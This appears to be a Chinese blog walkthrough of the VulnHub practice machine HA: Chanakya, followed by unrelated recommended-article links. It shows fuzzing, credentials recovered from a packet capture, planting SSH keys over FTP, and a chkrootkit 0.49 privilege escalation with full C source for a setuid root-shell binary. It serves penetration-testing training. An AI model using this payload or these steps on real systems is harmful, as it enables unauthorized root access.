HA-Chanakya

Vulnhub靶场

下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/

背景:

摧毁王国的策划者又回来了,这次他创造了一个难题,会让你挠头!是时候面对Chanakya。

您能否解决这个“从根本上启动”并证明自己更明智?

枚举是关键!!!!

 

 

 

首页:

全端口扫描

尝试匿名登录FTP

目录扫描

http://192.168.136.179/assets/

对里面的文件进行查看,是字体库。

这里实在没有发现什么,只能换大字典fuzz跑文件了,抓数据包,设置爆破点。

第一个点用了top10000,第二个点是常见后缀。

设置线程为999,跑了10多分钟,终于有了个文件。(字典取至dirmap)

http://192.168.136.179/abuse.txt

SSH、FTP的密码都不对,如果不是密码就可能是个文件吧。

http://192.168.136.179/nfubxn.cpncat没有该文件。

如果是加密文件应该就是错位等加密方法吧,试试栅栏密码、凯撒密码等。

凯撒密码加密偏移量为13。

http://192.168.136.179/ashoka.pcapng

Wireshark的流量包的格式

发现FTP的数据流含有账号密码且显示的是登陆成功。

ashoka:kautilya

依次访问没有发现可用的信息。

但显示的内容像是在用户路径下的隐藏文件,该ftp的目录可能就是ashoka用户的目录。

而且ftp运行新建文件夹和上传文件。

所以可以设置SSH免密登录,将文件上传到.ssh的文件夹下。

在kali上设置,刚开始使用了DSA 密钥。

ssh-keygen -t dsa

cd ~/.ssh/

cp id_dsa.pub authorized_keys

然后将authorized_keys上传到ftp的.ssh路径下。

连接ssh。

没有成功,中途多次修改了/etc/ssh/sshd_config的配置文件以及权限的修改也没能成功。

查阅资料发现:

使用了RSA 密钥试试,

这里如果不设置密码就三个回车,将会在.ssh文件夹下生成公钥(id_rsa.pub)和私钥(id_rsa),将公钥(id_rsa.pub)复制为authorized_keys并上传到ftp的.ssh文件夹下。

而且,这里的权限我也没有修改到700,保持的600权限。

ssh ashoka@192.168.136.179。这里也可以将id_rsa.pub文件下载利用Xshell等软件连接。

find / -user root -perm -4000 -print 2>/dev/null       查询suid文件

sudo -l       显示出自己(执行 sudo 的使用者)的权限

find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null     查询777权限文件

下载cha.zip,发现里面是网站的备份数据。

也没有什么用,翻来翻去,在/tmp下发现logs。

cat logs

百度看看这是什么文件。

是入侵检测工具chkrootkit生成的运行结果。

而且还是本地提权,就是他了。

find -name chkrootkit*  2>/dev/null       查询chkrootkit文件

查看chkrootkit的版本。

./chkrootkit -V

该版本存在漏洞。

同时,该漏洞要实现还需要能够运行chkrootkit,使它去调用update文件。

查看crontab -u root -l。没有权限,应该是有运行chkrootkit计划的。

在kali中新建一个update.c的文件,并写入下面的数据。

#include <unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

文件内容是利用chkrootkit将update文件属性修改为root:root,并给予任何人执行权限,当ashoka执行该文件时就能获取root的shell。

在kali下编译文件gcc update.c -o update

然后将update拷到ashoka的/tmp/下。

拷进去后,利用chkrootkit 0.49漏洞原理:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。从而使文件获取root权限,接下来运行该文件可提权。(所以上图的update才会从ashoka变为root)

这里我刚拷update进去不一会就变成root了。

运行./update

验证下crontab -l。每分钟运行一次chkrootkit并将结果返回到/tmp/logs。

-- Ly_Dargo

VulnHub靶场学习_HA: Chanakya的更多相关文章

  1. VulnHub靶场学习_HA: ARMOUR

    HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...

  2. VulnHub靶场学习_HA: InfinityStones

    HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...

  3. VulnHub靶场学习_HA: Avengers Arsenal

    HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...

  4. VulnHub靶场学习_HA: Pandavas

    HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...

  5. VulnHub靶场学习_HA: Natraj

    HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...

  6. VulnHub靶场学习_HA: Chakravyuh

    HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...

  7. VulnHub靶场学习_HA:Forensics

    HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ...

  8. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  9. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

随机推荐

  1. D - 渣渣仰慕的爱丽丝 HDU - 6249(背包问题变形)

    爱丽丝喜欢集邮.她现在在邮局买一些新邮票. 世界上有各种各样的邮票;它们的编号是1到N.但是,邮票不是单独出售的;必须成套购买.有M套不同的邮票可供选择; 第i套包括编号从li到ri的邮票 .同一枚邮 ...

  2. Boxes Packing

    Boxes Packing Mishka has got n empty boxes. For every i (1 ≤ i ≤ n), i-th box is a cube with side le ...

  3. oracle实现分页功能 limit功能例子

    oracle数据库不支持mysql中limit功能,但可以通过rownum来限制返回的结果集的行数,rownum并不是用户添加的字段,而是oracle系统自动添加的. 记录两种常用方法: (1)使查询 ...

  4. MATLAB实现一个EKF-2D-SLAM(已开源)

    1. SLAM问题定义 同时定位与建图(SLAM)的本质是一个估计问题,它要求移动机器人利用传感器信息实时地对外界环境结构进行估计,并且估算出自己在这个环境中的位置,Smith 和Cheeseman在 ...

  5. mybatis源码配置文件解析之一:解析properties标签

    mybatis作为日常开发的常用ORM框架,在开发中起着很重要的作用,了解其源码对日常的开发有很大的帮助.源码版本为:3-3.4.x,可执行到github进行下载. 从这篇文章开始逐一分析mybati ...

  6. Android AIDL[Android Interface Definition Language]跨进程通信

    全称与中文名IPC:Inter-Process Communication(进程间通信)Ashmem:Anonymous Shared Memory(匿名共享内存)Binder:Binder(进程间通 ...

  7. MySQL5.7使用Notifier启动、停止服务时出现的问题

    1.选择右击右下角 MySQL Notifier ,选择 Actions -> Manage Monitored Items 2.选择当前的服务 MySQL57  并进行删除 3.然后点击  a ...

  8. python调用js

    安装 pip install PyExecJS 方法 eval() 输入参数:source(JS语句).cwd(路径) 返回值:result(语句执行结果) compile() 输入参数:source ...

  9. Python pip高级用法

    1.pip 高级用法为了便于用户安装和管理第三方库和软件,越来越多的编程语言拥有自己的包管理工 具,如 nodejs 的 npm, ruby 的 gem. Python 也不例外,现在 Python ...

  10. 数据结构篇-数组(TypeScript版+Java版)

    1.TypeScript版本 export default class MyArray<E> { public data: E[]; public size: number = 0; /* ...